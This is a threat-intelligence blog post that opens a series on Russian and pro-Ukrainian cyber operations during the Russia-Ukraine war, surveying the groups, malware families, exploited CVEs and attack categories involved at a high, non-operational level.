Three Years of Cyber Warfare: How Digital Attacks Have Shaped the Russia-Ukraine War

As the third anniversary of the start of the Russia-Ukraine war approaches, Trustwave SpiderLabs created a series of blog posts to look back, reflect upon, and explain how this 21st Century war is being fought not just on the ground, air, and sea but also in the realm of cyber.

This last battlefield has exploded far outside Russian and Ukrainian national boundaries, with each combatant's national cyber forces and affiliated groups taking the fight not only directly to their foe but also to those who support their enemy to gain an upper hand that will lead to an advantage on the front lines.

In this series, Trustwave SpiderLabs examines the dozens of threat groups involved, details how they conduct their activities, the tricks and malware each leverage, and what they hope to accomplish. The series examines how these attackers go about striking operational technology being used along industry vertical sectors like technology and critical infrastructure.

These groups include the well-known, like APT44 and Turla on the Russian side, and names not normally mentioned in the press, such as the pro-Ukrainian Core Werewolf.

Trustwave SpiderLabs offers examples of communications attackers make on encrypted channels like Telegram and Signal, where they often brag of alleged success or post exfiltrated data.

Key Findings

Some of the findings we will be covering in this series include:

• In-depth looks at cyber warfare groups like Core Werewolf and Sticky Werewolf, two groups supporting Ukraine that have targeted Russian facilities with backdoors like UltraVNC and Ozone. On the Russia side, we will look at the Sandworm group, which has been elevated to the status of an Advanced Persistent Threat (APT) as APT44, as well as XakNet and CyberArmyofRussia_Reborn, groups focused on disruption and DDoS.
• Zero-Day exploits like the one used on Android devices by Russia’s APT29 to distribute spyware.
• Malware like the WhiteCat Log Cleaner used by APT44 in attacks on telecommunication providers and AcidPour, a purported successor to the AcidRain wiper used in attacks against Telecom provider Viasat in February 2022.
• SpiderLabs investigated the AcidPour malware – purportedly a successor to the AcidRain wiper used in attacks against Telecom provider Viasat in February 2022.
• Old TTPs like attacks targeting Ukrainian telecommunication providers and new TTPs like a shift to attacks targeting cloud and Wi-Fi-based assets.

Russian Cyber Operations Against Ukraine

To kick off this series, we’re going to focus on Russian cyber-attacks against Ukraine. Throughout 2024 and into 2025, Russian cyber operations have continued to play a critical role in its strategy against Ukraine, reflecting a well-coordinated, state-sponsored approach to cyber warfare. Russian attacks are typically conducted by APT groups, such as APT44 (Sandworm), APT28 (Fancy Bear), and Gamaredon, often operating under the direction of Russian intelligence agencies. These operations aim to disrupt critical infrastructure, steal sensitive data, and undermine Ukraine’s government and public morale.

Image 1: Cyberattacks Targeting Ukraine and Supporting Countries

Key Differences Between Russian and Ukrainian Cyber Operations

Russian cyberattacks are defined by their scale, coordination, and technical sophistication. Backed by state resources, Russian operations often involve zero-day vulnerabilities, custom malware, and long-term espionage campaigns. Unlike the decentralized nature of attacks conducted by the Ukrainian side, Russian operations are centrally controlled, enabling highly organized and precise strikes on critical targets. The visibility within organizations operating in Russia is also very limited, the number of attacks reported is very small when compared to attacks by Russian actors.

Russian attacks are also characterized by their dual-purpose strategies, combining disruption with data theft. For example, while some campaigns aim to sabotage Ukraine’s infrastructure, others focus on gathering intelligence to inform military operations or influence global perceptions through propaganda.

How Russian Actors Attack

Russian cyberattacks utilize a variety of methods tailored to disrupt Ukraine's critical infrastructure, government systems, and civilian morale:

• Critical Infrastructure Attacks
  Russian groups have repeatedly targeted Ukraine’s power grids, telecommunications networks, and energy supply systems. These attacks aim to cause widespread disruptions, especially during winter, when energy dependency is highest. We will discuss this in-depth in the third part of this series.

• Data Exfiltration and Espionage
  Russian APTs focus heavily on stealing sensitive data from Ukrainian government agencies, defense contractors, and NATO-aligned entities. This data is used for military intelligence, propaganda, and cyber-influence operations. We will discuss this in-depth in the second part of this series.

• Destructive Malware
  Russian actors frequently deploy wiper malware to render systems inoperable. These attacks aim to paralyze the Ukrainian government and military operations. Examples: WhisperGate, HermeticWiper, and newer variants.

• Ransomware Campaigns Disguised as Hacktivism
  Ransomware attacks attributed to Russian groups often aim to disrupt Ukrainian businesses and organizations. While ransom demands are sometimes made, these attacks are often politically motivated and meant to cause operational chaos.

• Distributed Denial-of-Service (DDoS) Attacks
  Massive DDoS campaigns are frequently launched against Ukrainian government websites, banks, and critical infrastructure to disrupt communication and essential services. However, pro-Russian groups capitalize on political actions to target Ukraine's external partners and supporters, framing these attacks as acts of revenge for their support of Ukraine.

• Phishing and Social Engineering
  Russian actors use sophisticated phishing campaigns to target Ukrainian officials, military personnel, and businesses, aiming to gain initial access to secure networks.

Vitally Needed Information

Understanding these operations is crucial for global critical infrastructure. While Russian Advanced Persistent Threats (APTs) are highly sophisticated, their methods—like exploiting zero-day vulnerabilities—are also used by cybercriminals. For example, the CL0P group exploited the MOVEit Transfer vulnerability (CVE-2023-34362), and Lockbit targeted GoAnywhere MFT (CVE-2023-0669), affecting hundreds of organizations.

Russian APT tactics include spear-phishing, social engineering, lateral movement, and Living Off the Land (LotL) techniques, using tools like Masscan, Metasploit, and Cobalt Strike. Detecting attack chains and anomalies, not just known threats, is essential.

Lessons from state-sponsored attacks should guide security practices across industries. Countering Russian APTs goes beyond immediate threats—it's about strengthening defenses against a broad range of cyber adversaries in an ever-evolving threat landscape.

Please join us next week for the rest of the series.